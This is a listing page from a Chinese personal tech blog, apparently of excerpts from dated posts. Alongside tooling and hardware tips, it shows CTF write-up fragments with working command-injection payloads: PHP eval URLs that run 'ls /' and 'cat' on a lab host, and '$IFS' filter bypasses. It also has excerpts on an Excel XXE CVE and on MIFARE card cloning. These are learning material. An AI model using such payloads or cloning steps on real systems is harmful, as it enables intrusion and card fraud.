March 21, 2024

在 VS Code 中优化 C++ 开发环境

VS Code 默认的智能感知配置可能不够理想,无法像 CLion 那样进行变量类型的推导。为了改进这一点,尝试使用 Clangd 扩展来增强 VS Code 中的智能感知功能。既然都配置了 Clangd,那就顺便学一手 CMake 的简单配置,即配置 C++ 编译器,并使用 CMake 来构建项目。
Read more
December 29, 2023

MIFARE Classic EV1 1K Crad 探索、复制、与解密

MIFARE Classic EV1 代表了 MIFARE Classic 产品系列的最高演进阶段,继承了所有以往版本的优良特性。它提供 1K 和 4K 内存版本,分别满足不同应用需求 / 👆🏻来自 MIFARE官网 / 介绍中的 1k 和 4k 为内存容量,比较常见的为 1k 版本
Read more
December 20, 2023

有锁卡贴 iPhone 配合 Apple Watch 的一些问题

进行任何操作前建议备份数据 / 笔者仅分享使用体验, 不为提到的工具负责 / 自写下这篇博客时 笔者设备的版本信息 iOS 16.4 macOS 14.1 watchOS 9.6.2 iPhone 加载 IPCC / 激活时提示
Read more
November 30, 2023

[CVE-2014-3529] Excel XXE

XXE – 外部实体注入(XML External Entity Injection),为利用 XML 处理器的漏洞的攻击技术。XML 外部实体注入漏洞允许攻击者向应用程序注入恶意内容,并在解析 XML 时触发。
Read more
August 31, 2023

[WebSec 信息泄露] php eval 与 vim 的临时交换文件

题目提示 vim 异常退出, 于是下载 .index.php.swp 进而通过 vim -r index.php.swp 恢复出如下代码 对源码分析后的 payload : ls 根目录 / http://124.221.34.13:50004/?cnss@30fc5b20a309996f3ab12662e3c4ac932c08db7f=$cmd%20=%20%27ls%20/%27;exec($cmd,%20$result,%20$var);var_dump($result);var_dump($var); 发现有 fl4444444g 这个可疑文件 cat flag / http://124.221.34.13:50004/?cnss@30fc5b20a309996f3ab12662e3c4ac932c08db7f=$cmd%20=%20%27cat%20/fl4444444g%27;exec($cmd,%20$result,%20$var);var_dump($result);var_dump($var);
Read more
July 27, 2023

LG TV 和 Mac 的显示兼容问题(开启 4k@120hz 10bit)

M1/M2 系列 MacBook 在链接 LG HDMI 电视时开启 4k-120hz-RGB 的方法: / 购置一条使用 VMM6100 或 VMM7100 的 Type-C to HDMI2.1 线材 / 然后按照此帖子中的办法刷写 固件 / 接着按照此帖子的方法修改 EDID , 修改好后按照帖子中的方法载入并且开启 针对此显示器的自动应用(随便翻译的) 就好了
Read more
July 18, 2023

buuCTF WEB方向刷题(熟悉 Yakit)

[GXYCTF2019]Ping Ping Ping 思路 推测为拼接执行 / $IFS$1 绕过空格, 创建 shell 变量绕过 flag 字符检测 / Payload /?ip=1|ls ls 一下查看文件, 看到有两个文件, 其中一个是 flag.php, 用上面的思路 cat 一下 / /?ip=1;a=g;cat$IFS$1fla$a.php 用 Yakit 传的时候记得关闭左边的强制 https
Read more
July 2, 2023

PWNable.kr 肥肠适合初学者

col ssh 连上执行ls -la看看(-la参数可以浏览文件属性) cat col.c查看源文件 / #include <stdio.h> #include <string.h> unsigned long hashcode = 0x21DD09EC; unsigned long check_password(const char* p){ int* ip = (int*)p; int i; int res=0; for(i=0; i<5; i++){ res += ip[i]; } return res; } int main(int argc, char* argv[]){ if(argc<2){ printf("usage : %s [passcode]\n", argv[0]); return 0; } if(strlen(argv[1]) != 20){ printf("passcode length should be 20 bytes\n"); return 0; } if(hashcode == check_password( argv[1] )){ system("/bin/cat flag"); return 0; } else printf("wrong passcode.\n"); return 0; } 分析出需要执行 col 这个程序时传参, 而且参数需要20bytes长, 同时要求参数经过 check_password() 后等于 hashcode 变量
Read more
June 1, 2023

SGMW(上汽五菱) CTF

一道很有趣的词频分析(tag:密码/杂项) 感谢 AcexZe 师傅帮助 AcezZe: 运气好,词频出来一看知道要反转一下,以为是栅栏或者凯撒的后续,试了一下发现没啥特殊的,就继续看看字频了 / 给了 password.txt 和 flag.zip , 思路是对 password.txt 进行词频分析(具体步骤可以看下面的 psw_string.py ),并且按照 psw_string.py 逻辑进行去除噪声,即可拿到压缩包密码
Read more
March 4, 2023

RSA中的个人奇思妙想

公钥加密就私钥解密 私钥加密就公钥解密
Read more